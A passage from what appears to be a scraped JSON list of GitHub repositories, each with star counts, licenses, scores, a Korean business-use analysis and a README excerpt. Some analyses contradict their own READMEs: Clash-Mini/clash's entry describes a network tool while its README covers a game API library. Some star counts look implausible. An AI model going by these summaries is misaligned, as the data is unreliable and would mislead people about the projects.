문제 해결 시간을 획기적으로 단축시킵니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: Mac 앱 개발사들이 구독하는 \"크래시 분석 플","readme_excerpt":"![MacSymbolicator](/Resources/Assets.xcassets/AppIcon.appiconset/Icon_128x128.png?raw=true)\n\n# MacSymbolicator 2.6\n\t\nA simple Mac app for symbolicating macOS/iOS crash reports.\n\nSupports symbolicating:\n\n- .crash and .ips crash reports\n- sample, spindump and hang reports\n\nIncludes a command-line interface (`MacSymbolicator.app/Contents/MacOS/MacSymbolicatorCLI`):\n\n```\nUSAGE: mac-symbolicator-cli [--translate-only] [--uuids-only] [--verbose] [--output <output>] <report-file-path> [<dsym-path> ...]\n\nARGUMENTS:\n  <report-file-path>      The report file: .crash/.ips for crash reports .txt for samples/spindumps\n  <dsym-path>             The dSYMs to use for symbolication\n\nOPTIONS:\n  -t, --translate-only    Translate the crash report from .ips to .crash\n  -u, --uuids-only        Output binary images and UUIDs\n  -v, --verbose\n  -p, --process-name <process-name>\n                          Only symbolicate process names containing this substring (case\n                          sensitive). Useful ","composite_score":0.1631,"license_safety_tag":"restricted"},{"name":"Qihoo360/RePlugin","github_url":"https://github.com/Qihoo360/RePlugin","stars":25,"language":"Java","license":"apache-2.0","abandonment_months":8,"description":"# RePlugin 저장소 분석\n\n## 왜 보물인가\n안드로이드 앱을 마치 레고 블록처럼 조립해서 만들 수 있는 기술로, 앱 개발 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 모바일 앱 빌더 플랫폼 - 코딩 없이 앱을 만들고 싶은 중소 비즈니스에게 제공\n2. **내부 업무 도구**: 기업의 앱 개발팀이 개","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://github.com/Qihoo360/RePlugin/wiki\">\n    <img alt=\"RePlugin Logo\" src=\"https://github.com/Qihoo360/RePlugin/wiki/img/RePlugin.png\" width=\"400\"/>\n  </a>\n</p>\n\n[![license](http://img.shields.io/badge/license-Apache2.0-brightgreen.svg?style=flat)](https://github.com/Qihoo360/RePlugin/blob/master/LICENSE)\n\n[![Release Version](https://img.shields.io/badge/release-2.3.3-brightgreen.svg)](https://github.com/Qihoo360/RePlugin/releases)\n\n## ！！！重要通知！！！\n\n由于jcenter停服原因，RePlugin将迁移到http://maven.geelib.360.cn/nexus上\n\n如果需要继续接入RePlugin，需要在项目的build.gradle内增加新的仓库地址:\n\nmaven {url \"http://maven.geelib.360.cn/nexus/repository/replugin/\"}\n\n\n## 通知\n\n\n**360开源又一力作——[ArgusAPM移动性能监控平台](https://github.com/Qihoo360/ArgusAPM)**\n\n[ArgusAPM](https://github.com/Qihoo360/ArgusAPM)是360手机卫士客户端团队继RePlugin之后开源的又一个重量级开源项目。ArgusAPM是360移动端产品使用的可视化性能监控平台，为移动端APP提供性能监控与管理，可以迅速发现和定位各类APP性能和使用问题，帮助APP不断的提升用户体验。\n\n\n**360移动技术最新活动通知：**\n\n2018年12月16日，360移动性能开放日邀您参加，届时将会有360、美团技术大牛为大家分享Android、iOS性能监控实","composite_score":0.1628,"license_safety_tag":"safe"},{"name":"vectorizedio/redpanda","github_url":"https://github.com/vectorizedio/redpanda","stars":10,"language":"C++","license":"unknown","abandonment_months":0,"description":"# Redpanda 저장소 분석\n\n## 왜 보물인가\n대량의 실시간 데이터를 빠르게 처리하고 저장하는 기술로, 금융거래, 주식시세, 실시간 알림 같은 즉각적인 반응이 필요한 서비스의 핵심 기반이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **실시간 알림 SaaS**: 고객에게 주식 가격 변동, 배송 추적, 채팅 메시지를 즉시 전달하는 서비스\n2. **","readme_excerpt":"# Redpanda\n\n[![Documentation](https://img.shields.io/badge/documentation-black)](https://redpanda.com/documentation)\n[![Slack](https://img.shields.io/badge/slack-purple)](https://redpanda.com/slack)\n[![Twitter](https://img.shields.io/twitter/follow/redpandadata.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=redpandadata)\n[![Redpanda University](https://img.shields.io/badge/Redpanda%20University-black)](https://university.redpanda.com/)\n<p align=\"center\">\n<a href=\"https://www.redpanda.com/\"><img src=\"docs/icon-redpanda.svg\" alt=\"redpanda icon\" width=\"400\"></a>\n</p>\n\nRedpanda is the most complete, Apache Kafka®-compatible streaming data platform, designed from the ground up to be lighter, faster, and simpler to operate. Free from ZooKeeper™ and JVMs, it prioritizes an end-to-end developer experience with a huge ecosystem of connectors, configurable tiered storage, and more.\n\n# Table of Contents\n\n- [Get started](#get-started)\n  - [Prebuilt packages](#prebuil","composite_score":0.1627,"license_safety_tag":"unknown"},{"name":"AI4Finance-LLC/FinRL","github_url":"https://github.com/AI4Finance-LLC/FinRL","stars":8,"language":"Jupyter Notebook","license":"MIT","abandonment_months":2,"description":"# FinRL 저장소 분석\n\n## 왜 보물인가\n인공지능을 활용해 주식이나 암호화폐 같은 금융 자산을 자동으로 사고팔 수 있는 시스템으로, 개인 투자자도 전문가 수준의 자동화된 거래 도구를 이용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **자산관리 플랫폼 SaaS**: 일반 투자자를 위한 월 구독 서비스로 \"자동으로 당신의 자산을 관리해주는 AI 어","readme_excerpt":"<div align=\"center\">\n<img align=\"center\" width=\"30%\" alt=\"image\" src=\"https://github.com/AI4Finance-Foundation/FinGPT/assets/31713746/e0371951-1ce1-488e-aa25-0992dafcc139\">\n</div>\n\n# FinRL: Financial Reinforcement Learning → FinRL-X\n\n<div align=\"center\">\n<img align=\"center\" src=figs/logo_transparent_background.png width=\"55%\"/>\n</div>\n\n[![Downloads](https://static.pepy.tech/badge/finrl)](https://pepy.tech/project/finrl)\n[![Downloads](https://static.pepy.tech/badge/finrl/week)](https://pepy.tech/project/finrl)\n[![Join Discord](https://img.shields.io/badge/Discord-Join-blue)](https://discord.gg/trsr8SXpW5)\n[![Python 3.6](https://img.shields.io/badge/python-3.6-blue.svg)](https://www.python.org/downloads/release/python-360/)\n[![PyPI](https://img.shields.io/pypi/v/finrl.svg)](https://pypi.org/project/finrl/)\n[![Documentation Status](https://readthedocs.org/projects/finrl/badge/?version=latest)](https://finrl.readthedocs.io/en/latest/?badge=latest)\n![License](https://img.shields.io/github/l","composite_score":0.1626,"license_safety_tag":"safe"},{"name":"airyland/vux","github_url":"https://github.com/airyland/vux","stars":5,"language":"Vue","license":"mit","abandonment_months":2,"description":"# airyland/vux 저장소 분석\n\n## 왜 보물인가\nVue.js 개발자들이 빠르게 웹 애플리케이션을 만들 수 있도록 도와주는 UI 컴포넌트 모음으로, 프로페셔널한 결과물을 손쉽게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**SaaS 서비스**: 프로젝트 관리, 팀 협업, 분석 대시보드 같은 웹 기반 구독 서비스의 사용자 인터페이스 구축\n\n**","readme_excerpt":"<p align=\"center\">\n  <a href=\"http://vux.li\">\n    <img src=\"https://i.loli.net/2017/11/20/5a12187ebf2e0.png\" width=\"175\">\n  </a>\n</p>\n<p align=\"center\">Be Cool with Vue@^2.3.0 and WeUI.</p>\n\n<p align=\"center\">\n  <a href=\"https://vux.li/demos/v2?x-page=github\">\n    <img src=\"https://static.vux.li/demo_v2_doc_home.png\" width=\"100\" alt=\"\">\n  </a>\n  <br>\n  <a href=\"https://vux.li/demos/v2?x-page=github\">\n    Live Demo >>\n  </a>\n  <br>\n  <br>\n  <a href=\"https://github.com/airyland/vux\">\n    <img src=\"https://img.shields.io/github/stars/airyland/vux.svg?style=social&label=Star\" alt=\"\">\n  </a>\n  <a href=\"https://github.com/airyland/vux\">\n    <img src=\"https://img.shields.io/github/forks/airyland/vux.svg?style=social&label=Fork\" alt=\"\">\n  </a>\n  <a href=\"https://github.com/airyland/vux\">\n    <img src=\"https://img.shields.io/github/watchers/airyland/vux.svg?style=social&label=Watch\" alt=\"\">\n  </a>\n  <br>\n  <br>\n  <a href=\"https://travis-ci.org/airyland/vux\">\n    <img src=\"https://api.travis-ci.","composite_score":0.1621,"license_safety_tag":"safe"},{"name":"yvoronoy/awesome-english","github_url":"https://github.com/yvoronoy/awesome-english","stars":5,"language":"","license":"cc0-1.0","abandonment_months":12,"description":"# yvoronoy/awesome-english 분석\n\n## 왜 보물인가\n영어 학습에 필요한 모든 자료를 한곳에 모아둔 정리된 학습 가이드로, 누구나 자유롭게 사용하고 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **영어 학습 플랫폼**: 개인 맞춤형 영어 과정 추천 기능으로 학습자별 최적 자료 제시\n2. **기업 직원 교육 도구**: 사내 영어 ","readme_excerpt":"# Awesome English 2025 [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)\n\nA curated collection of high-quality resources for learning English,\nfocused on practicing the core skills — listening, speaking, reading, and writing.\nIncludes resources for grammar, vocabulary, and media to enhance your English studies.\nThis list is for:\n\n- ESL Learners at all levels\n- Self-study enthusiasts seeking structured practice\n- Educators looking for student resources\n- Professionals improving English for work, study, or travel\n\n## Contents\n\n- [Top Picks](#top-picks)\n- [Listening](#listening)\n- [Speaking](#speaking)\n- [Watching](#watching)\n- [Reading](#reading)\n- [Writing](#writing)\n- [AI-Powered English Learning](#ai-powered-english-learning)\n- [Grammar](#grammar)\n- [Vocabulary](#vocabulary)\n- [Tools](#tools)\n- [Exercises and Tests](#exercises-and-tests)\n- [Online Classes](#online-classes)\n- [FAQ or Common Questions](#faq-or-common-questions)\n- [Contribute](#contribute)\n\n## Top Picks\n<!--","composite_score":0.1619,"license_safety_tag":"unknown"},{"name":"devMEremenko/XcodeBenchmark","github_url":"https://github.com/devMEremenko/XcodeBenchmark","stars":5,"language":"Swift","license":"MIT","abandonment_months":2,"description":"# XcodeBenchmark 상용화 분석\n\n## 왜 보물인가\n앱 개발 속도를 측정하고 개선하는 도구로, 개발팀의 생산성 향상을 직접 수치화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발사들이 구독하여 자신의 앱 개발 속도를 주기적으로 측정하고 리포트받는 클라우드 기반 분석 플랫폼\n2. **내부 업무 도구**: 대규모 소프","readme_excerpt":"**XcodeBenchmark measures Mac performance in Xcode by compiling a [relatively large codebase](https://github.com/devMEremenko/XcodeBenchmark/tree/master?tab=readme-ov-file#faq).**\n\nThe project has already saved thousands of dollars for developers and companies when they purchase or upgrade their Macs and I believe these results will help you make the right *cost/performance* choice.\n\n\n## Sponsorship\n<img src=\"https://raw.githubusercontent.com/Schweinepriester/github-profile-achievements/main/images/public-sponsor-default.png\" width=\"16px\" height=\"16px\"> Visit the [GitHub Sponsor page](https://github.com/sponsors/devMEremenko) if you'd like to support the project. 🤗\n\n\nIf a device you are looking for is not listed below, check out open [issues](https://github.com/devMEremenko/XcodeBenchmark/issues) and [PRs](https://github.com/devMEremenko/XcodeBenchmark/pulls).\n\n## Xcode 26\n\n|        Device        |           CPU           | RAM | SSD | Xcode |   macOS  | Time(sec) |\n|:-----------------","composite_score":0.1618,"license_safety_tag":"safe"},{"name":"kerlomz/captcha_trainer","github_url":"https://github.com/kerlomz/captcha_trainer","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":7,"description":"# captcha_trainer 사업화 분석\n\n## 왜 보물인가\n웹사이트와 앱이 봇 공격으로부터 자신을 보호하기 위해 필요한 보안 도구를 직접 만들고 개선할 수 있는 오픈소스 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 보안 검증 SaaS 서비스**\n- 은행, 쇼핑몰, 게임사가 자신의 서비스에 맞춘 봇 방지 시스템을 구독료로 이용\n- 커스터마이징된 보","readme_excerpt":"\n# 1. 项目介绍\n\n基于深度学习的图片验证码的解决方案 - 该项目能够秒杀字符粘连重叠/透视变形/模糊/噪声等各种干扰情况，足以解决市面上绝大多数复杂的[验证码场景](#jump)，目前也被用于其他OCR场景。 \n<div align=center>\n<img src=\"https://raw.githubusercontent.com/kerlomz/captcha_trainer/master/resource/logo.png\" style=\"zoom:70%;\" />\n</div>\n\n<div align=center>\n<a href=\"https://github.com/kerlomz/captcha_trainer/blob/master/LICENSE\"><img src=\"https://img.shields.io/badge/license-MIT-blue.svg\"></a>\n</div>\n\n该项目基于 TensorFlow 1.14 开发，旨在帮助中小企业或个人用户快速构建图像分类模型并投入生产环境使用，降低技术应用门槛。\n\n面向算法工程师：提供了可拓展的结构支持，允许通过源码灵活方便的添加自己设计的网络结构及其他组件。\n\n面向零基础用户：有需求？但是不会编程？时间就是金钱，学习成本太高我想白嫖。它简直为你而生！\n\n面向需求频繁者：同样的类型的需求一天10个，它的复用程度让您无需一份代码一个需求，一套服务全部搞定。\n\n\n\n> **编译版下载地址：** https://github.com/kerlomz/captcha_trainer/releases/\n\n------\n\n其使用的网络结构主要包含三部分，从下至上依次为：\n<div align=center>\n<img src=\"https://raw.githubusercontent.com/kerlomz/captcha_trainer/master/resource/net_structure.png\" style=\"zoom:80%;\" />\n</div>\n>  输入OP:  **input** ， 输出OP:   **dense_decoded** \n\n\n\n卷积层：从输入图像中提取特征序列;\n\n循环层，预测从卷积层获取的特征序列的标签（真实值）分布;\n\n转录层，把从循环层获","composite_score":0.1617,"license_safety_tag":"safe"},{"name":"visionmedia/supertest","github_url":"https://github.com/visionmedia/supertest","stars":5,"language":"JavaScript","license":"mit","abandonment_months":2,"description":"# Supertest 저장소 분석\n\n## 왜 보물인가\n웹 서비스가 제대로 작동하는지 자동으로 검증해주는 도구로, 개발자들이 버그를 조기에 발견하고 서비스 품질을 높일 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 협업 도구의 API가 정상 작동하는지 지속적으로 모니터링하는 품질 관리 솔루션\n2. **내부 업무 ","readme_excerpt":"# [supertest](https://forwardemail.github.io/superagent/)\n\n[![build status](https://github.com/forwardemail/supertest/actions/workflows/ci.yml/badge.svg)](https://github.com/forwardemail/supertest/actions/workflows/ci.yml)\n[![code coverage](https://img.shields.io/codecov/c/github/ladjs/supertest.svg)](https://codecov.io/gh/ladjs/supertest)\n[![code style](https://img.shields.io/badge/code_style-XO-5ed9c7.svg)](https://github.com/sindresorhus/xo)\n[![styled with prettier](https://img.shields.io/badge/styled_with-prettier-ff69b4.svg)](https://github.com/prettier/prettier)\n[![made with lass](https://img.shields.io/badge/made_with-lass-95CC28.svg)](https://lass.js.org)\n[![license](https://img.shields.io/github/license/ladjs/supertest.svg)](LICENSE)\n\n> HTTP assertions made easy via [superagent](http://github.com/ladjs/superagent).  Maintained for [Forward Email](https://github.com/forwardemail) and [Lad](https://github.com/ladjs).\n\n## About\n\nThe motivation with this module is to provide a hig","composite_score":0.1617,"license_safety_tag":"safe"},{"name":"xiaoxian521/vue-pure-admin","github_url":"https://github.com/xiaoxian521/vue-pure-admin","stars":12,"language":"Vue","license":"MIT","abandonment_months":1,"description":"# vue-pure-admin 분석 보고서\n\n## 왜 보물인가\n누구나 쉽게 사용할 수 있는 웹사이트 관리 화면을 만들 수 있는 무료 템플릿으로, 기업들이 직접 개발하지 않고도 전문적인 관리 시스템을 빠르게 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 고객 관리, 매출 통계, 사용자 권한 관리가 필요한 웹 서비스의 기본 ","readme_excerpt":"<h1>vue-pure-admin</h1>\n\n![GitHub license](https://img.shields.io/github/license/pure-admin/vue-pure-admin?style=flat)\n![GitHub stars](https://img.shields.io/github/stars/pure-admin/vue-pure-admin?color=fa6470&style=flat)\n![GitHub forks](https://img.shields.io/github/forks/pure-admin/vue-pure-admin?style=flat)\n\n**中文** | [English](./README.en-US.md)\n\n## 简介\n\n`vue-pure-admin` 是一款开源免费且开箱即用的中后台管理系统模版。完全采用 `ECMAScript` 模块（`ESM`）规范来编写和组织代码，使用了最新的 `Vue3`、\n`Vite`、`Element-Plus`、`TypeScript`、`Pinia`、`Tailwindcss` 等主流技术开发\n\n## 研发理念\n\n稳定中求创新，技术中见未来\n\n## 精简版本（实际项目开发请用精简版本，提供 `非国际化` 、`国际化` 两个版本选择）\n\n精简版本是基于 [vue-pure-admin](https://github.com/pure-admin/vue-pure-admin) 提炼出的架子，包含主体功能，更适合实际项目开发，打包后的大小在全局引入 [element-plus](https://element-plus.org) 的情况下仍然低于 `2.3MB`，并且会永久同步完整版的代码。开启 `brotli` 压缩和 `cdn` 替换本地库模式后，打包大小低于 `350kb`\n\n[点我查看非国际化精简版本](https://github.com/pure-admin/pure-admin-thin)  \n[点我查看国际化精简版本](https://github.com/pure-admin/pure-admin-thin/tree/i18n)\n\n## 配套视频\n\n[点我查看 UI 设计](https://www.bilibili.com/vi","composite_score":0.1616,"license_safety_tag":"safe"},{"name":"Tencent/wepy","github_url":"https://github.com/Tencent/wepy","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":2,"description":"# Tencent/wepy 사업화 분석\n\n## 왜 보물인가\n텐센트가 만든 소형 프로그램 개발 도구로, 중국의 WeChat 앱에서 작동하는 미니앱을 빠르고 쉽게 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: WeChat 미니앱 개발 플랫폼으로 제공하여 중소 기업들이 쉽게 앱을 만들도록 지원\n2. **내부 업무 도구**: 기","readme_excerpt":"[English](./README_EN.md) | 简体中文\n\n> **📦 项目已归档**\n>\n> 随着微信小程序生态的不断演进，本项目已不再活跃维护。WePY 早已完成了它的历史使命，现有代码已不再具有参考意义，我们建议新项目选用更现代的方案。\n>\n> 在开源的这些年里，由于个人精力问题，导致项目的维护和响应未能做好，在此真诚地向各位贡献者和使用者说一声抱歉。\n>\n> 再次感谢大家理解，继续前行 🤝\n\n## WePY 2 (beta)\n\n[![npm version](https://badge.fury.io/js/wepy.svg)](https://badge.fury.io/js/wepy)\n[![travis-ci](https://travis-ci.org/Tencent/wepy.svg?branch=1.7.x)](https://travis-ci.org/Tencent/wepy)\n![Github CI](https://github.com/Tencent/wepy/workflows/WePY%20CI%20Build/badge.svg?branch=2.0.x)\n[![Coverage Status](https://coveralls.io/repos/github/Tencent/wepy/badge.svg?branch=1.7.x)](https://coveralls.io/github/Tencent/wepy?branch=1.7.x)\n[![Dependency Status](https://david-dm.org/Tencent/wepy.svg)](https://david-dm.org/Tencent/wepy)\n\n### 介绍\n\nWePY 资源汇总：[awesome-wepy](https://github.com/aben1188/awesome-wepy)\n\nWePY (发音: /'wepi/)是一款让小程序支持组件化开发的框架，通过预编译的手段让开发者可以选择自己喜欢的开发风格去开发小程序。框架的细节优化，Promise，Async Functions 的引入都是为了能让开发小程序项目变得更加简单，高效。\n\n同时 WePY 也是一款成长中的框架，大量吸收借鉴了一些优化前端工具以及框架的设计理念","composite_score":0.1614,"license_safety_tag":"unknown"},{"name":"SergioBenitez/Rocket","github_url":"https://github.com/SergioBenitez/Rocket","stars":11,"language":"Rust","license":"NOASSERTION","abandonment_months":5,"description":"# Rocket 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션을 빠르고 안전하게 만들 수 있는 현대적인 개발 도구로, 초보자도 복잡한 기술을 쉽게 다룰 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 회사 관리 소프트웨어, 협업 도구, 클라우드 저장소 같은 웹 기반 서비스 구축\n- **내부 업무 도구**: 직원들이 사용하는 재무","readme_excerpt":"# Rocket\n\n[![Build Status](https://github.com/rwf2/Rocket/workflows/CI/badge.svg)](https://github.com/rwf2/Rocket/actions)\n[![Rocket Homepage](https://img.shields.io/badge/web-rocket.rs-red.svg?style=flat&label=https&colorB=d33847)](https://rocket.rs)\n[![Current Crates.io Version](https://img.shields.io/crates/v/rocket.svg)](https://crates.io/crates/rocket)\n[![Matrix: #rocket:mozilla.org](https://img.shields.io/badge/style-%23rocket:mozilla.org-blue.svg?style=flat&label=[m])](https://chat.mozilla.org/#/room/#rocket:mozilla.org)\n\nRocket is an async web framework for Rust with a focus on usability, security,\nextensibility, and speed.\n\n```rust\n#[macro_use] extern crate rocket;\n\n#[get(\"/<name>/<age>\")]\nfn hello(name: &str, age: u8) -> String {\n    format!(\"Hello, {} year old named {}!\", age, name)\n}\n\n#[launch]\nfn rocket() -> _ {\n    rocket::build().mount(\"/hello\", routes![hello])\n}\n```\n\nVisiting `localhost:8000/hello/John/58`, for example, will trigger the `hello`\nroute resulting in the st","composite_score":0.1613,"license_safety_tag":"unknown"},{"name":"modmail-dev/logviewer","github_url":"https://github.com/modmail-dev/logviewer","stars":98,"language":"Python","license":"GPL-3.0","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.1613,"license_safety_tag":"restricted"},{"name":"Clash-Mini/clash","github_url":"https://github.com/Clash-Mini/clash","stars":8,"language":"Python","license":"MIT","abandonment_months":0,"description":"# Clash-Mini/clash 보물 분석\n\n## 왜 보물인가\n게임이나 앱에서 필요한 **네트워크 트래픽 관리 기술**을 간단하게 사용할 수 있도록 만든 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 플랫폼 SaaS**: 모바일 게임 개발사가 플레이어의 인터넷 속도를 자동으로 최적화해주는 유료 서비스로 제공\n2. **기업 네트워크 관리 도구**: ","readme_excerpt":"# mihomo\nA simple python pydantic model (type hint and autocompletion support) for Honkai: Star Rail parsed data from the Mihomo API.\n\nAPI url: https://api.mihomo.me/sr_info_parsed/{UID}?lang={LANG}\n\n## Installation\n```\npip install -U git+https://github.com/KT-Yeh/mihomo.git\n```\n\n## Usage\n\n### Basic\nThere are two parsed data formats:\n- V1:\n  - URL: https://api.mihomo.me/sr_info_parsed/800333171?lang=en&version=v1\n  - Fetching: use `client.fetch_user_v1(800333171)`\n  - Data model: `mihomo.models.v1.StarrailInfoParsedV1`\n  - All models defined in `mihomo/models/v1` directory.\n- V2: \n  - URL: https://api.mihomo.me/sr_info_parsed/800333171?lang=en\n  - Fetching: use `client.fetch_user(800333171)`\n  - Data model: `mihomo.models.StarrailInfoParsed`\n  - All models defined in `mihomo/models` directory.\n\nIf you don't want to use `client.get_icon_url` to get the image url everytime, you can use `client.fetch_user(800333171, replace_icon_name_with_url=True)` to get the parsed data with asset urls.","composite_score":0.161,"license_safety_tag":"safe"},{"name":"Eugeny/terminus","github_url":"https://github.com/Eugeny/terminus","stars":9,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# Eugeny/Terminus 분석 리포트\n\n## 왜 보물인가\n터미널(명령창)을 더 쉽고 강력하게 사용할 수 있도록 만드는 도구로, 개발자뿐만 아니라 IT 관리자와 파워유저들이 업무 속도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 터미널 관리 플랫폼으로 회사 전직원이 안전하게 서버에 접근하도록 제공\n2. ","readme_excerpt":"[![](docs/readme.png)](https://tabby.sh)\n\n\n<p align=\"center\">\n  <a href=\"https://github.com/Eugeny/tabby/releases/latest\"><img alt=\"GitHub All Releases\" src=\"https://img.shields.io/github/downloads/eugeny/tabby/total.svg?label=DOWNLOADS&logo=github&style=for-the-badge\"></a> &nbsp; <a href=\"https://nightly.link/Eugeny/tabby/workflows/build/master\"><img src=\"https://shields.io/badge/-Nightly%20Builds-orange?logo=hackthebox&logoColor=fff&style=for-the-badge\"/></a> &nbsp; <a href=\"https://discord.gg/Vn7BjmzhtF\"><img alt=\"Discord\" src=\"https://img.shields.io/discord/1280890060195233934?style=for-the-badge&color=blue&logo=discord&logoColor=white&label=Discord\"></a> &nbsp <a href=\"https://translate.tabby.sh/\"><img alt=\"Translate\" src=\"https://shields.io/badge/Translate-UI-white?logo=googletranslate&style=for-the-badge&color=white&logoColor=fff\"></a>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://ko-fi.com/J3J8KWTF\">\n    <img src=\"https://cdn.ko-fi.com/cdn/kofi3.png?v=2\" width=\"150\">\n  </a>\n</p>\n","composite_score":0.161,"license_safety_tag":"safe"},{"name":"rrousselGit/river_pod","github_url":"https://github.com/rrousselGit/river_pod","stars":7,"language":"Dart","license":"mit","abandonment_months":1,"description":"# River Pod 상용화 분석 보고서\n\n## 왜 보물인가\n앱 개발자들이 복잡한 데이터 관리를 간단하게 처리할 수 있도록 도와주는 핵심 기술로, 개발 시간을 크게 단축시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발자 도구로 제공하여 월 구독료를 받는 클라우드 기반 개발 플랫폼\n2. **내부 업무 도구**: 대규모 앱 개","readme_excerpt":"<p>\n  <a href=\"https://flutter.dev/docs/development/packages-and-plugins/favorites\">\n    <img src=\"https://raw.githubusercontent.com/rrousselGit/riverpod/master/resources/flutter_favorite.png\" width=\"100\" align=\"left\" />\n  </a>\n  <a href=\"https://github.com/rrousselGit/riverpod/actions\"><img src=\"https://github.com/rrousselGit/riverpod/workflows/Build/badge.svg\" alt=\"Build Status\"></a>\n  <a href=\"https://codecov.io/gh/rrousselgit/riverpod\"><img src=\"https://codecov.io/gh/rrousselgit/riverpod/branch/master/graph/badge.svg\" alt=\"codecov\"></a>\n  <a href=\"https://github.com/rrousselgit/riverpod\"><img src=\"https://img.shields.io/github/stars/rrousselgit/riverpod.svg?style=flat&logo=github&colorB=deeppink&label=stars\" alt=\"Star on Github\"></a>\n  <a href=\"https://opensource.org/licenses/MIT\"><img src=\"https://img.shields.io/badge/license-MIT-purple.svg\" alt=\"License: MIT\"></a>\n  <a href=\"https://discord.gg/GSt793j6eT\"><img src=\"https://img.shields.io/discord/765557403865186374.svg?logo=discor","composite_score":0.1605,"license_safety_tag":"safe"},{"name":"alicevision/meshroom","github_url":"https://github.com/alicevision/meshroom","stars":5,"language":"QML","license":"NOASSERTION","abandonment_months":0,"description":"# Meshroom 프로젝트 분석\n\n## 왜 보물인가\n사진 여러 장으로 3D 모델을 자동으로 만들어주는 오픈소스 도구로, 영화·게임·건축 산업에서 수백만 원대의 상용 소프트웨어를 대체할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 3D 스캔 SaaS 서비스**\n사용자가 사진을 업로드하면 클라우드에서 자동으로 3D 모델을 생성해주는 구독형 웹 서비스로","readme_excerpt":"# ![Meshroom - 3D Reconstruction Software](/docs/logo/banner-meshroom.png)\n\nMeshroom is an open-source, node-based visual programming framework—a flexible toolbox for creating, managing, and executing complex data processing pipelines.\n\nMeshroom uses a nodal system where each node represents a specific operation, and output attributes can seamlessly feed into subsequent steps. When a node’s attribute is modified, only the affected downstream nodes are invalidated, while cached intermediate results are reused to minimize unnecessary computation.\n\nMeshroom supports both local and distributed execution, enabling efficient parallel processing on render farms.\nIt also includes interactive widgets for visualizing images and 3D data. Official releases come with built-in plugins for computer vision and machine learning tasks.\n\n[![Ask DeepWiki](https://deepwiki.com/badge.svg)](https://deepwiki.com/alicevision/Meshroom)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects","composite_score":0.1604,"license_safety_tag":"unknown"},{"name":"tjukanovt/30DayMapChallenge","github_url":"https://github.com/tjukanovt/30DayMapChallenge","stars":7,"language":"Python","license":"MIT","abandonment_months":8,"description":"# 30DayMapChallenge 저장소 분석\n\n## 왜 보물인가\n지도 시각화 기술과 데이터 시각화 커뮤니티의 교육 자료로, 전 세계 데이터 분석가들이 참고하고 공유하는 실용적인 학습 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **지도 기반 분석 SaaS**: 부동산 시장, 유동인구, 배송 최적화 분석 서비스로 B2B 구독료 수금\n2. **내부 업무 도","readme_excerpt":"## Daily social mapping project happening every November\n\nThe official repository for #30DayMapChallenge, a daily mapping challenge open to everyone.\n\n![Themes for the maps. See more below.](https://raw.githubusercontent.com/tjukanovt/30DayMapChallenge/main/images/flyers/30dmc_2025.png)\n\n| Date       | Name                  | Description                                                                                                                                                                                                                                                                           |\n|------------|-----------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|\n| 01-11-2025 | Points                | Challenge Classic: Map with point ","composite_score":0.1603,"license_safety_tag":"safe"},{"name":"romellogoodman/flow-field.js","github_url":"https://github.com/romellogoodman/flow-field.js","stars":16,"language":"JavaScript","license":"MIT","abandonment_months":8,"description":"# flow-field.js 상업화 분석\n\n## 왜 보물인가\n화면에 움직이는 입자나 유체 같은 시각 효과를 만드는 기술로, 게임, 영상 제작, 웹사이트 디자인에서 시선을 사로잡는 연출 효과를 쉽게 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 웹사이트 배경 애니메이션 SaaS**\n- 마케팅 담당자가 코딩 없이 자신의 웹사이트에 멋진 배경 효과를","readme_excerpt":"# flow-fields\n\nA library for generating flow fields.\n\nCheck out the visualizer:\n- [flow-fields.romellogoodman.com](https://flow-fields.romellogoodman.com/)\n- [Flow Fields Visualizer Github Repo](https://github.com/romellogoodman/flow-fields-visualizer)\n\nResources for learning more about flow fields and noise:\n\n- [Flow Field Are.na Board](https://www.are.na/romello-goodman/flow-fields-ddrqag_mr44)\n- [Flow Fields by Tyler Hobbs](https://tylerxhobbs.com/essays/2020/flow-fields)\n- [Noise by Varun Vachhar](https://varun.ca/noise/)\n\n## Use\n\n```js\nconst field = generateField({ count: 100, height: 1000, width: 1000 });\n```\n\n## Contributing\n\nAll contributors and all contributions both big and small are welcome in this project.\n\n## Author\n\n[Romello Goodman](https://www.romellogoodman.com/)\n","composite_score":0.1602,"license_safety_tag":"safe"},{"name":"Microsoft/cpprestsdk","github_url":"https://github.com/Microsoft/cpprestsdk","stars":5,"language":"C++","license":"NOASSERTION","abandonment_months":1,"description":"# Microsoft/cpprestsdk 분석 보고서\n\n## 왜 보물인가\n마이크로소프트가 만든 안정적인 통신 라이브러리로, 웹 서비스와 클라우드 연결이 필요한 모든 소프트웨어의 기초가 될 수 있습니다.\n\n## 어디에 